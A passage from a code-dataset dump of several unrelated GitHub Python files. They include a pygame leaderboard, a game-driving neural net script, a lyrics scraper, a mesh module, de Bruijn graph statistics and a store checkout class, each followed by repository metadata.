Player\r\nimport pygame\r\nimport sys\r\n\r\nWINDOW_WIDTH = 1000\r\nWINDOW_HEIGHT = 600\r\n\r\n\r\n\r\narquivo_json = 'C:/Users/pedri/OneDrive/Área de Trabalho/programação/python/Orientação a Objetos - Faculdade/Projeto Final/players.json'\r\nwith open(arquivo_json) as fp:\r\n playersList = json.load(fp)\r\n\r\n\r\nclass Leaderboard:\r\n def __init__(self, window):\r\n self.window = window\r\n self.font = pygame.font.Font(None, 36)\r\n self.overlay = pygame.Surface((WINDOW_WIDTH, WINDOW_HEIGHT))\r\n self.overlay.set_alpha(200) # Ajuste a opacidade conforme necessário\r\n self.overlay.fill((0, 0, 0))\r\n \r\n\r\n def mostrar_pontuacoes(self, scores):\r\n showing_scores = True\r\n\r\n while showing_scores:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n self.window.blit(self.overlay, (0, 0))\r\n\r\n text = self.font.render(\"Maiores Pontuações: \", True, (255, 255, 255))\r\n self.window.blit(text, (WINDOW_WIDTH // 2 - text.get_width() // 2, 20))\r\n\r\n for i, score in enumerate(scores):\r\n text = self.font.render(f\"{i + 1}- {score}\", True, (255, 255, 255))\r\n self.window.blit(text, (WINDOW_WIDTH // 2 - text.get_width() // 2, 70 + i * 30))\r\n\r\n pygame.display.flip()\r\n \r\n \r\ndef scores():\r\n listaMaioresPontuacoes = []\r\n listaNomesMaioresPontuadores = []\r\n for i in range(len(playersList)):\r\n listaMaioresPontuacoes.append(playersList[i]['_Player__pontuacao'])\r\n listaNomesMaioresPontuadores.append(playersList[i]['_Player__nome'])\r\n #ordernar o dicionario\r\n dados_combinados = list(zip(listaMaioresPontuacoes, listaNomesMaioresPontuadores))\r\n dados_combinados = sorted(dados_combinados, reverse=True)\r\n return dados_combinados[:10]\r\n\r\ndef adicionar_player(nome_de_usuario): #adiciona um player novo a nossa base de dados\r\n newPlayer = Player(nome_de_usuario, 100)\r\n playersList.append(vars(newPlayer))\r\n with open(arquivo_json, 'w') as updateFile:\r\n json.dump(playersList, updateFile, indent=4)\r\n\r\n\r\n\r\ndef verificar_player(username):\r\n if(len(playersList) == 0):\r\n return 2 #significa que a nossa base de dados nao tem nenhum player\r\n for i in range(len(playersList)):\r\n if playersList[i]['_Player__nome'] == username: \r\n #se existe, a funcao retornará o nome e a pontuacao do player\r\n return playersList[i]['_Player__nome'], playersList[i]['_Player__pontuacao']\r\n return False #quer dizer que o player nao existe na nossa base de dados\r\n \r\n \r\ndef inicializar_score(username):\r\n for i in range(len(playersList)):\r\n if playersList[i]['_Player__nome'] == username:\r\n return playersList[i]['_Player__pontuacao']\r\n \r\n \r\n \r\ndef atualizar_score(username, score):\r\n for i in range(len(playersList)):\r\n if playersList[i]['_Player__nome'] == username:\r\n playersList[i]['_Player__pontuacao'] = score\r\n with open(arquivo_json, 'w') as updateFile:\r\n json.dump(playersList, updateFile, indent=4)","repo_name":"patrickacs/projeto01-oo","sub_path":"Projeto Final/leaderboard.py","file_name":"leaderboard.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4458598384","text":"from alexnet import alexnet\nimport numpy as np\nimport config\nimport cv2\nimport time\nfrom key_output import PressKey,ReleaseKey, W, A, D\nimport win32api\nimport win32con\nimport win32gui\nimport win32ui\nimport random\n\n#This function reads user keypresses\ndef readKey():\n keys = []\n for key in \"C\":\n if win32api.GetAsyncKeyState(ord(key)):\n keys.append(key)\n return keys\n\n# This function captures screenshots of the game window\n# This function was modified from https://stackoverflow.com/questions/50278695/grabscreen-py-python-win32api\ndef screenGrab(left, top):\n hwin = win32gui.GetDesktopWindow()\n\n width = config.WINDOW_WIDTH - left + 1\n height = config.WINDOW_HEIGHT - top + 1\n\n hwindc = win32gui.GetWindowDC(hwin)\n srcdc = win32ui.CreateDCFromHandle(hwindc)\n memdc = srcdc.CreateCompatibleDC()\n bmp = win32ui.CreateBitmap()\n bmp.CreateCompatibleBitmap(srcdc, width, height)\n memdc.SelectObject(bmp)\n memdc.BitBlt((0, 0), (width, height), srcdc, (left, top), win32con.SRCCOPY)\n\n signedIntsArray = bmp.GetBitmapBits(True)\n img = np.fromstring(signedIntsArray, dtype='uint8')\n img.shape = (height,width,4)\n\n srcdc.DeleteDC()\n memdc.DeleteDC()\n win32gui.ReleaseDC(hwin, hwindc)\n win32gui.DeleteObject(bmp.GetHandle())\n\n return cv2.cvtColor(img, cv2.COLOR_BGRA2RGB)\n\ndef main():\n\n model = alexnet(config.CAPTURE_WIDTH, config.CAPTURE_HEIGHT, config.LEARNING_RATE)\n model.load(config.MODEL_NAME)\n \n paused = False\n print('AI is driving, press \"C\" to pause') # \"C\" used for convenient keyboard position\n\t\n while(True):\n if not paused:\n screenShot = screenGrab(0,40) # 40 pixel offset to account for titlebar\n\t\t\t\n\t\t\t# Reduce image size\n screenShot = cv2.cvtColor(screenShot, cv2.COLOR_BGR2RGB)\n screenShot = cv2.resize(screenShot, (config.CAPTURE_WIDTH, config.CAPTURE_HEIGHT))\n\t\t\t\n\t\t\t# Get model prediction\n prediction = model.predict([screenShot.reshape(config.CAPTURE_WIDTH,config.CAPTURE_HEIGHT,3)])[0]\n #print( np.trunc(prediction*10**2) / (10**2) * 100 ) # prediction printout\n\n # \"Only turn if you're sure you want to turn!\"\n turningThreshold = 0.85\n accelerationThreshold = 0.95\n\n if prediction[1] > accelerationThreshold:\n PressKey(W)\n print(\"GO\")\n elif prediction[0] > turningThreshold:\n PressKey(A)\n print(\"Left\")\n elif prediction[2] > turningThreshold:\n PressKey(D)\n print(\"Right\")\n \n\t\t\t# Using sleep is not an ideal method because execution is suspended, need to find a way to do some sort of callback if there is time\n time.sleep(config.KEY_PRESS_DURATION) \n\t\t\t# Release all keys after alotted time\n ReleaseKey(W)\n ReleaseKey(A)\n ReleaseKey(D)\n\n keys = readKey()\n\n if 'C' in keys:\n if paused == True:\n paused = False\n time.sleep(0.5) # This line prevents thrashing of toggle state\n print('AI driving')\n else:\n paused = True\n time.sleep(0.5)\n print('AI paused')\n\nmain() \n\n\n\n\n\n\n\n\n\n\n","repo_name":"CoolerGalaxy/AI_Car_Driver","sub_path":"test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43349335320","text":"import math\nimport datetime as dt\nimport random\nimport yaml\n\nwith open('configs/priority.yml', 'r') as file:\n configs = yaml.safe_load(file)\n\nRATE_WEIGHT = configs['rate_weight']\nCALM_WINDOW = configs['calm_window']\nRANDOM_BOMBING = configs['random_bombing']\nRANDOM_WEIGHT = configs['random_weight']\nNEW_WORD_WEIGHT = configs['new_word_weight']\n\n\nclass ComputePriority(object):\n def __init__(self):\n self.today = dt.datetime.today().date()\n\n def compute(self, keywords):\n assert isinstance(keywords, dict)\n for key, val in keywords.items():\n last_review = val['review_history'][-1]\n last_date, last_rate = last_review[0], last_review[1]\n year, month, day = last_date.split('-')\n delta_days = (self.today - dt.date(int(year), int(month), int(day))).days\n\n # Calm Window: for newly reviewed/created keywords\n if delta_days <= CALM_WINDOW:\n val['priority'] = 100\n continue\n\n # Base Priority: is based on algorithm function\n base_priority = self.algorithm(delta_days)\n\n # Review Adjusted Priority: is based on latest review\n adjusted_priority = base_priority * RATE_WEIGHT[last_rate]\n adjusted_priority = round(min(100.0, adjusted_priority), 1)\n val['priority'] = adjusted_priority\n\n # Random bombing: toss a coin and decide if random bomb\n coin = random.random()\n if coin < RANDOM_BOMBING['prob']:\n val['priority'] *= RANDOM_BOMBING['weight']\n\n # Random weight: toss a coin and decide the random weight\n # This is to avoid 2 similar keywords always stick together\n coin2 = random.randint(0, len(RANDOM_WEIGHT)-1)\n random_weight = RANDOM_WEIGHT[coin2]\n val['priority'] *= random_weight\n\n # Promote new words:\n # Words passed calm window but hasn't been reviewed yet\n if len(val['review_history']) <= 1:\n val['priority'] *= NEW_WORD_WEIGHT\n\n return keywords\n\n def algorithm(self, days):\n # Ebbinghaus Forgetting Curve\n c = 1.25\n k = 1.84\n t = days * 24 * 60\n b = 100 * k / (math.log(t, 10)**c + k)\n return b\n\n\n\n","repo_name":"ruthnot/keyword-master","sub_path":"compute_priority.py","file_name":"compute_priority.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8830854444","text":"from clld.web.util.htmllib import HTML, literal\nfrom clld.web.util.helpers import map_marker_img, get_adapter, external_link\n\n\ndef contribution_detail_html(context=None, request=None, **kw):\n c = context.description\n if c and \"\" in c:\n c = c.split(\"\")[1].split(\"\")[0]\n return {\"text\": c}\n\n\ndef value_table(ctx, req):\n rows = []\n langs = {}\n\n for i, de in enumerate(ctx.domain):\n exclusive = 0\n shared = 0\n\n for v in [_v for _v in de.values]:\n\n if len(v.valueset.values) > 1:\n shared += 1\n else:\n exclusive += 1\n langs[v.valueset.language_pk] = 1\n\n cells = [\n HTML.td(map_marker_img(req, de)),\n HTML.td(literal(de.description)),\n HTML.td(str(exclusive), class_='right'),\n ]\n cells.append(HTML.td(str(shared), class_='right'))\n cells.append(HTML.td(str(len(de.values)), class_='right'))\n rows.append(HTML.tr(*cells))\n\n\n rows.append(HTML.tr(\n HTML.td('Total Languages:', colspan=str(len(cells) - 1), class_='right'),\n HTML.td('%s' % len(langs), class_='right')))\n\n parts = []\n # if ctx.multivalued:\n parts.append(HTML.thead(\n HTML.tr(*[HTML.th(s, class_='right')\n for s in [' ', ' ', 'exclusive', 'partial', 'all']]))\n )\n parts.append(HTML.tbody(*rows))\n return HTML.table(*parts, class_='table table-condensed')\n\n\ndef parameter_link(req, sym, p):\n return HTML.a(sym, href=req.resource_url(p), style=\"color: black;\") if p else sym","repo_name":"PaprikaSteiger/ooaclld","sub_path":"ooaclld/ooaclld/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9783302805","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport numpy as np\nimport open3d\nimport math\n\n\n#assume all geometry lies in radius of 1;\n#set the parameter as this then;\n#somehow load a \n#there may be a large deformation...one may need to have vertex color instead;\nclass TriMesh(nn.Module):\n def __init__(self,radius=.7,tex_channel=3,resolution_mesh=4000,resolution_featmap=1024):\n super().__init__()\n sph_init=open3d.geometry.TriangleMesh.create_sphere(radius=radius,resolution=int(math.sqrt(resolution_mesh//4))+1,create_uv_map=True)\n vtx=torch.from_numpy(np.asarray(sph_init.vertices).astype(np.float32))\n tri=torch.from_numpy(np.asarray(sph_init.triangles).astype(np.int32))\n uv=torch.from_numpy(np.asarray(sph_init.triangle_uvs).astype(np.float32))\n uv_index=torch.from_numpy(np.arange(0,uv.shape[0]).astype(np.int32).reshape(uv.shape[0]//3,3))\n texmap=torch.zeros((resolution_featmap,resolution_featmap,tex_channel),dtype=torch.float32)\n vertex_color=torch.zeros((vtx.shape[0],tex_channel),dtype=torch.float32)\n \n #self.register_parameter(\"vertex\",nn.Parameter(vtx))\n self.register_parameter(\"texmap\",nn.Parameter(texmap))\n self.register_parameter(\"vertex_color\",nn.Parameter(vertex_color))\n \n self.register_buffer(\"vertex\",(vtx))\n self.register_buffer(\"uv\",uv)\n self.register_buffer(\"uv_idx\",uv_index)\n self.register_buffer(\"tri_idx\",tri)\n\n def forward(self,tri_idx,barycentric):\n tri=self.tri_idx[tri_idx]\n color=self.vertex_color[tri[0]]*barycentric[0]+self.vertex_color[tri[1]]*barycentric[1]+self.vertex_color[tri[2]]*barycentric[2]\n return color\n\n \n\n","repo_name":"Inn1917/arch_recon","sub_path":"src/models/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29205845251","text":"# -*-coding:utf-8-*-\nTest_dict = {\n \"ARGs\":\n {\"Category\": 20,\n \"label_list\": {0: 'Betalactams', 1: 'Trimethoprim', 2: 'MLS', 3: 'Fusidic acid', 4: 'Fosfomycin',\n 5: 'Aminoglycosides', 6: 'Fluoroquinolones', 7: 'Multi-drug resistance', 8: 'Glycopeptides',\n 9: 'Phenicol', 10: 'Rifampin', 11: 'Tetracyclines', 12: 'Peptide', 13: 'Bacitracin',\n 14: 'Sulfonamide', 15: 'Nucleosides', 16: 'Aminocoumarins', 17: 'Triclosan', 18: 'Mupirocin',\n 19: 'Others'},\n \"class_model\": \"Pretrained_model/ARGs_class.pkl\",\n \"group_model\": \"Pretrained_model/ARGs_group.pkl\",\n \"CoreEmbedding\": 'Pretrained_model/resistance_gene/Core_DataBase/CoreEmbedding.txt',\n \"Core\": \"Pretrained_model/resistance_gene/Core_DataBase/core.txt\"\n },\n \n \"VFs\":\n {\"Category\": 46,\n \"label_list\": {0: 'Toxin', 1: 'Adherence and invasion', 2: 'Secretion system & effectors', 3: 'Motility',\n 4: 'Superantigen', 5: 'Iron uptake', 6: 'Regulation', 7: 'Immune evasion', 8: 'Capsule',\n 9: 'Antiphagocytosis', 10: 'Mammalian cell entry (mce) operons', 11: 'Endotoxin',\n 12: 'Serum resistance', 13: 'Autotransporter', 14: 'Unclassified', 15: 'Biofilm formation',\n 16: 'Antimicrobial activity', 17: 'Enzyme', 18: 'Immune modulator',\n 19: 'Variable surface lipoprotein', 20: 'Quorum sensing', 21: 'Cell surface components',\n 22: 'Magnesium uptake', 23: 'Glycosylation system', 24: 'Stress adaptation',\n 25: 'Catabolism of cholesterol', 26: 'Acid resistance', 27: 'Amino acid and purine metabolism',\n 28: 'Lipid and fatty acid metabolism', 29: 'Biosurfactant', 30: 'Manganese uptake',\n 31: 'Nutritional factor ', 32: 'Anti-apoptosis factor', 33: 'Anaerobic respiration',\n 34: 'Secreted proteins', 35: 'Copper uptake', 36: 'Phagosome arresting',\n 37: 'Intracellular survival', 38: 'Macrophage inducible genes', 39: 'Efflux pump',\n 40: 'Bile resistance', 41: 'Surface protein anchoring', 42: 'Actin-based motility',\n 43: 'Nucleation-promoting factor', 44: 'Peptidoglycan modification', 45: 'Non-VFs'},\n \"class_model\": \"Pretrained_model/VFs_class.pkl\",\n \"group_model\": \"Pretrained_model/VFs_group.pkl\",\n \"CoreEmbedding\": 'Pretrained_model/virulence_factor/Core_DataBase/CoreEmbedding.txt',\n \"Core\": \"Pretrained_model/virulence_factor/Core_DataBase/core.txt\"\n }\n}\n","repo_name":"emblab-westlake/FunGeneTyper","sub_path":"Config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23341244442","text":"#!/usr/bin/python3\n# dark-scraper.py\n\n# Downloads the lyrics for all the songs in a darklyrics page\n# for an artist.\n# Usage: dark-scraper.py []\n# or: dark-scraper.py []\n\nimport sys\nimport re\nimport threading\nfrom urllib.request import urlopen\nfrom queue import PriorityQueue\n\nfrom bs4 import BeautifulSoup\n\nif len(sys.argv) != 3 and len(sys.argv) != 2:\n print('Usage: {} []'.format(sys.argv[0]), file=sys.stderr)\n sys.exit(1)\n\n# Thread-safe print function\n__print_lock = threading.Lock()\n__p = print\ndef print(*args, **kwargs):\n with __print_lock:\n __p(*args, **kwargs)\n\ndef scrape_from_html(album_html):\n \"\"\"\n Given a string containing the html of an album, scrape\n the lyrics from it\n \"\"\"\n soup = BeautifulSoup(album_html, 'html.parser')\n header = soup.find('h2').get_text()\n content = soup.find('div', class_='lyrics')\n\n thanks = content.find('div', class_='thanks')\n if thanks:\n thanks.decompose()\n\n note = content.find('div', class_='note')\n if note:\n note.decompose()\n\n #get rid of the 'ARTIST LYRICS' thing\n regex = re.compile(r'[A-Z ]*LYRICS')\n blocks = regex.split(content.get_text())\n\n text = '*'*(len(header)+4)\n text = text + '\\n' + '* '+header+' *'\n text = text + '\\n' + '*'*(len(header)+4)\n\n for block in blocks:\n text = text + '\\n' + block\n\n return text\n\n# called by each thread\ndef get_url(q, url, index):\n print('Scraping: {}'.format(url), file=sys.stderr)\n try:\n album_html = urlopen(url).read().decode('utf-8')\n q.put((index, album_html))\n except Exception as e:\n print('get_url: Error in page: {}\\n{}'.format(url, e), file=sys.stderr)\n\ndef main():\n # Figure out the URL to use\n source_arg = sys.argv[1]\n if source_arg.startswith('http://'):\n url = source_arg\n elif source_arg.startswith('www.'):\n url = 'http://'+source_arg\n elif source_arg.startswith('darklyrics.com'):\n url = 'http://www.'+source_arg\n else:\n source_arg = source_arg.lower().replace(' ', '')\n url = 'http://www.darklyrics.com/{}/{}.html'.format(source_arg[0], source_arg)\n\n # Read artist page\n print('Accessing {}'.format(url), file=sys.stderr)\n\n with urlopen(url) as ufd:\n artist_html = ufd.read().decode('utf-8')\n\n artist_re = re.compile(r'\".*#1\"')\n artist_mo = artist_re.findall(artist_html)\n\n album_urls = [s.replace('..', 'http://www.darklyrics.com')[1:-3] for s in artist_mo]\n\n # Create threads to download and scrape each page\n q = PriorityQueue()\n threads = []\n for i, url in enumerate(album_urls):\n thread = threading.Thread(target=get_url, args=(q, url, i))\n thread.daemon = True\n thread.start()\n threads.append(thread)\n\n # Wait for all urls to download\n for thread in threads:\n thread.join()\n\n # File to store output in\n file_name = None\n if len(sys.argv) == 2:\n artist_soup = BeautifulSoup(artist_html, \"html.parser\")\n file_name = artist_soup.find(\"title\").get_text() + \".txt\"\n else:\n file_name = sys.argv[2]\n fd = open(file_name, \"w\")\n\n # Go through the queue\n while not q.empty():\n try:\n index, album_html = q.get()\n text = scrape_from_html(album_html)\n print(text, file=fd)\n except Exception as e:\n print(\"Error scraping from html: {}\".format(album_html), file=sys.stderr)\n print(e, file=sys.stderr)\n\n\n fd.close()\n\nif __name__ == '__main__':\n main()\n","repo_name":"medakk/darklyrics-scraper","sub_path":"darklyrics-scraper.py","file_name":"darklyrics-scraper.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"3105240493","text":"import numpy as np\nimport os\nfrom pyfastaq import sequences as pyfs\nfrom pyfastaq import tasks as pyftasks\nimport pandas as pd\nfrom collections import Counter\nimport igraph\n\n\ndef debruijn_fasta_to_igraph(fastafile):\n unitigs = pyfs.file_reader(fastafile)\n G = igraph.Graph().as_directed()\n\n ids = []\n min_counts = []\n all_edges = []\n\n for entry in unitigs:\n items = [x for x in entry.id.split(' ') if len(x) > 0]\n id_ = items[0]\n min_counts.append(min([int(x) for x in items[4].split(',')]))\n edges = [x for x in items if x[0:2] == 'L:']\n\n G.add_vertex(name=id_,\n )\n\n edges_to_add = [(id_, \"%s%s\" % (e.split(':')[3].replace('+', ''), e.split(':')[2])) for e in edges]\n all_edges.extend(edges_to_add)\n\n G.add_edges(all_edges)\n G.vs[\"min_count\"] = min_counts\n return G\n\n\ndef strongly_connected_components_description(dir):\n connected = 0\n single = 0\n\n for file in os.listdir(dir):\n comp_graph = os.path.join(dir, file)\n G = debruijn_fasta_to_igraph(comp_graph)\n scc = G.clusters(mode=\"strong\")\n sizes = np.array(scc.sizes())\n big_scc = set(np.where(sizes > 1)[0])\n if len(big_scc) > 0:\n #print(comp_graph, [(x, sizes[x]) for x in big_scc])\n big_sizes = [str(sizes[x]) for x in big_scc]\n print(f\"{comp_graph} has {len(big_sizes)} cycle(s) of sizes\", \", \".join(big_sizes))\n connected += 1\n else:\n single += 1\n print(f\"{connected} weakly connected components in {dir} contain cycle.\")\n\n\ndef covered_base_number(assembly_dir,\n orig_data=\"../../dataset_foxo_19_11/Selex2_S1_L001_R1_001.fasta\"):\n fasta = pyfs.file_reader(orig_data)\n base_number_orig = 0\n for entry in fasta:\n base_number_orig += len(entry.seq)\n print(f\"Original file: {base_number_orig}\")\n\n base_number_assem = 0\n for csv in os.listdir(assembly_dir):\n df = pd.read_csv(os.path.join(assembly_dir, csv), sep=';', header=None)\n df.columns = ['sq', 'count']\n lengths = df['sq'].apply(lambda row: len(row))\n counts = lengths * df[\"count\"]\n base_number_assem += counts.sum()\n print(f\"Assembled files: {base_number_assem}\")\n print(f\"Coverage of data: {base_number_assem / base_number_orig}%\")\n\n\ndef component_size_histogram(dir):\n sq_nos = Counter()\n for file in os.listdir(dir):\n comp_file = os.path.join(dir, file)\n no = pyftasks.count_sequences(comp_file)\n sq_nos[no] += 1\n return sq_nos\n\n\ndef get_candidates_for_separate_learning(dir, min_node_count=100, min_forking_part=0.3, for_view=True):\n candidates = []\n for file in os.listdir(dir):\n comp_graph = os.path.join(dir, file)\n G = debruijn_fasta_to_igraph(comp_graph)\n\n if G.vcount() >= min_node_count:\n a = Counter(G.outdegree())\n forks = sum([a[i] for i in [2, 3, 4]]) # at least two sufficiently abundant variants follow\n\n # candidates for separate learning\n if forks / G.vcount() >= min_forking_part:\n if for_view:\n candidates.append(os.path.join(dir.strip('/')+'_pictures', file+'.pdf'))\n else:\n candidates.append(comp_graph)\n return candidates","repo_name":"Caeph/paperfly","sub_path":"decomposition/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18393304168","text":"# 1이 될 때까지 (최소 횟수)\n# n 이 1이 될때까지 두가지 연산 반복 (1. N에서 1을 뺀다 2. n을 k로 나눈다 ) 단, 2의 연산은 n 이 k로 나누어 떨어질때 가능하다.\n\nn, k = map(int, input().split())\nresult = 0\n\n# n 이 k 이상일때 k로 나누기\nwhile n >= k:\n # n 이 k 로 나누어 떨어질때까지 1 빼기\n while n % k != 0:\n n -= 1\n result += 1\n n //= k\n result += 1\n\n# 남은 n에 대해서 1 빼기\nwhile n > 1:\n n -= 1\n result += 1\n\nprint(result)","repo_name":"choheejin/Study_Algorithm","sub_path":"preparation/TilOne.py","file_name":"TilOne.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30008242598","text":"import json\n\n\nwith open('food_services.json', mode='r', encoding='UTF-8') as json_file:\n rows = json.load(json_file)\n areas, institution = {}, {}\n\n for row in rows:\n areas.setdefault(row['District'], 0)\n areas[row['District']] += 1\n if row['IsNetObject'] == 'да':\n institution.setdefault(row['OperatingCompany'], 0)\n institution[row['OperatingCompany']] += 1\n\nprint(*max(areas.items(), key=lambda x: x[1]), sep=': ')\nprint(*max(institution.items(), key=lambda x: x[1]), sep=': ')\n","repo_name":"lockiz/-stepik_tests_course","sub_path":"4_Working_with_files/json_step_15/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2315905784","text":"import re\nimport json\n\nfrom Item import Item\n\nclass Checkout():\n \"\"\"\n This object runs the store.\n It creates and stores Items in the store and maintains a cart for customers to track their purchases.\n \"\"\"\n def __init__(self):\n self.store = []\n self.cart = []\n\n \"\"\" If an Item is not already in the store, this will add it to the store. \"\"\"\n def add_item_to_store(self, name, price_per_unit, unit_type):\n for item in self.store:\n if item.name == name:\n #Item is already in store\n raise(ValueError)\n self.store.append(Item(name, price_per_unit, unit_type))\n\n \"\"\" Retreives Item information for an Item in the store \"\"\"\n def get_item_information(self, name):\n matches = list(filter(lambda x: x.name == name, self.store))\n if matches == []:\n return None\n else:\n return matches[0]\n\n \"\"\" Returns the list of Items in the store available for sale. \"\"\"\n def get_items_in_store(self):\n return self.store\n\n \"\"\" Returns the list of Items in the customer's cart to be purchased. \"\"\"\n def get_items_in_cart(self):\n return self.cart\n\n \"\"\" Scan an Item to indicate that the customer is purchasing it. \"\"\"\n def add_item_to_cart(self, name, quantity):\n item = self.get_item_information(name)\n if item is None or quantity < 0: raise(ValueError) #Throw an error if they scan something the store does not sell.\n item_in_cart = self.get_item_information_from_cart(name)\n if item_in_cart is not None:\n item_in_cart['quantity'] += quantity #If they have the same Item in their cart, increase the quantity.\n else:\n self.cart.append({\"item\": item, \"quantity\": quantity}) #If this is a new Item, add it to their cart.\n\n \"\"\" Get information about an Item in the cart. \"\"\"\n def get_item_information_from_cart(self, name):\n matches = list(filter(lambda x: x['item'].name == name, self.cart))\n if matches == []:\n return None\n else:\n return matches[0]\n\n \"\"\" Remove an Item or quantity of Items from the cart. \"\"\"\n def remove_item_from_cart(self, name, quantity):\n item_in_cart = self.get_item_information_from_cart(name)\n if item_in_cart is None or quantity < 1:\n raise(ValueError)\n elif item_in_cart['quantity'] > quantity:\n item_in_cart['quantity'] -= quantity\n elif item_in_cart['quantity'] == quantity:\n self.cart.remove(item_in_cart)\n else:\n raise(ValueError)\n\n \"\"\" Remove an item from the store. \"\"\"\n def remove_item_from_store(self, name):\n item_in_store = self.get_item_information(name)\n if item_in_store is None: raise(ValueError)\n self.store.remove(item_in_store)\n\n \"\"\" Calculates the checkout total using Item information, including specials and markdowns. \"\"\"\n def get_checkout_total(self):\n total = 0.0\n for item in self.cart:\n special = item['item'].get_special_price()\n if special is not None:\n special = special.lower()\n\n #Translate a \"free\" or \"half off\" discount into a percentage discount to deduplicate code.\n if \"free\" in special or \"half off\" in special:\n special = special.replace(\"free\",\"at %100 off\").replace(\"half off\",\"at %50 off\").replace(\"get\", \"items, get\")\n\n #I was not sure if this function is required if all Items of one type share a price and markdown conditions. I may refactor this later.\n if \"of equal or lesser value for\" in special:\n special = special.replace(\"of equal or lesser value for\",\"at\").replace(\",\",\" items,\")\n\n #Determine which special discount to apply.\n\n #Percentage discount special\n if re.search(r'^buy \\d+ items, get \\d+ at %\\d+ off', special):\n pattern = re.compile(r'^buy (?P\\d+) items, get (?P\\d+) at %(?P\\d+) off')\n match = pattern.match(special).groupdict()\n minimum_items = int(match['purchase_requirement']) + int(match['discounted_quantity'])\n percentage_discount = int(match['percentage_discount']) / 100.0\n\n #If there is a limit on the discount, only apply discount up to max.\n if re.search(r'^buy \\d+ items, get \\d+ at %\\d+ off. limit (\\d+)', special):\n pattern_with_limit = re.compile(r'^buy \\d+ items, get \\d+ at %\\d+ off. limit (?P\\d+)')\n match_with_limit = pattern_with_limit.match(special).groupdict()\n max_discount_sets = int(match_with_limit['limit']) / minimum_items\n max_discounted_items = max_discount_sets * int(match['discounted_quantity'])\n discounted_items = int(int(item['quantity']) / minimum_items) * int(match['discounted_quantity'])\n if discounted_items > max_discounted_items:\n discounted_items = max_discounted_items\n\n #Else, apply discount to all available Items of this type.\n else:\n discounted_items = int(int(item['quantity']) / minimum_items) * int(match['discounted_quantity'])\n full_price_items = int(item['quantity']) - discounted_items\n total += (item['item'].get_price() * full_price_items) + (item['item'].get_price() * (1 - percentage_discount) * discounted_items)\n\n # N for $N special\n elif re.search(r'^\\d+ for \\$\\d+', special):\n pattern = re.compile(r'^(?P\\d+) for \\$(?P\\d+)')\n match = pattern.match(special).groupdict()\n if item['quantity'] > int(match['quantity']):\n discount_count = int(item['quantity'] / int(match['quantity']))\n\n #Same as previous block, check for limit condition.\n if re.search(r'^^\\d+ for \\$\\d+. limit (\\d+)', special):\n pattern_with_limit = re.compile(r'^\\d+ for \\$\\d+. limit (?P\\d+)')\n match_with_limit = pattern_with_limit.match(special).groupdict()\n max_discount_sets = int(match_with_limit['limit']) / int(match['quantity'])\n if max_discount_sets < discount_count:\n discount_count = max_discount_sets\n remainder = item['quantity'] - (discount_count * int(match['quantity']))\n total += discount_count * float(match['price']) + item['item'].get_price() * remainder\n else:\n total += item['item'].get_price() * item['quantity']\n\n # Code left behind from deduplication, but left in comment in case I refactor the \"equal or less than \" conditions\n # elif re.search(r'^buy \\d+ items, get \\d+ of equal or lesser value for %\\d+ off', special):\n # pattern = re.compile(r'^buy (?P\\d+) items, get (?P\\d+) of equal or lesser value for %(?P\\d+) off')\n # match = pattern.match(special).groupdict()\n # print(\"Special: \", match)\n\n #There is no discount applied.\n else:\n total += item['item'].get_price() * item['quantity']\n return total\n\n \"\"\" Returns the Item in the form of a dictionary \"\"\"\n def dict(self):\n checkout_dict = {}\n checkout_dict['items_in_store'] = self.store\n checkout_dict['items_in_cart'] = self.cart\n return checkout_dict\n\n \"\"\" Returns the Item as JSON, to be used by API \"\"\"\n def json(self):\n checkout_dict = {}\n checkout_dict['items_in_store'] = [x.json() for x in self.store]\n checkout_dict['items_in_cart'] = [{\"item\": x['item'].json(), \"quantity\": x['quantity']} for x in self.cart]\n return json.dumps(checkout_dict)\n\n \"\"\" Get the list of items in the store as JSON. \"\"\"\n def get_store_as_json(self):\n return json.dumps({\"items_in_store\": [x.json() for x in self.store]})\n\n \"\"\" Get the list of items in the customer's cart as JSON. \"\"\"\n def get_cart_as_json(self):\n return json.dumps({\"items_in_cart\": [{\"item\": x['item'].json(), \"quantity\": x['quantity']} for x in self.cart]})\n","repo_name":"Savrimyi/CheckoutOrderTotal","sub_path":"Checkout.py","file_name":"Checkout.py","file_ext":"py","file_size_in_byte":8656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34325404696","text":"from datetime import *\r\nfrom typing import Any\r\n\r\nfrom meteostat import *\r\nfrom pandas import *\r\n\r\n\r\n# ----TEMP----VARIABLES\r\n\r\n# total_max_year_list = []\r\n# avg_high_max_year_list = []\r\n# avg_low_max_year_list = []\r\n# avg_medium_year_list = []\r\n# avg_high_min_year_list = []\r\n# avg_low_min_year_list = []\r\n# total_min_year_list = []\r\n# city_coords = []\r\ndef wind_parameters(place, period):\r\n city_coords = 